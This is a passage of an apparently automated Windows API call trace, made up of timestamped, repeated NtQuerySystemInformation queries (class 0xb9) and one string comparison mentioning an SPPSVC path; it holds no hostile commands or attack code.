NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0269.274] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0269.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.275] NtQuerySystemInformation (SystemInformationClass=0xb9, 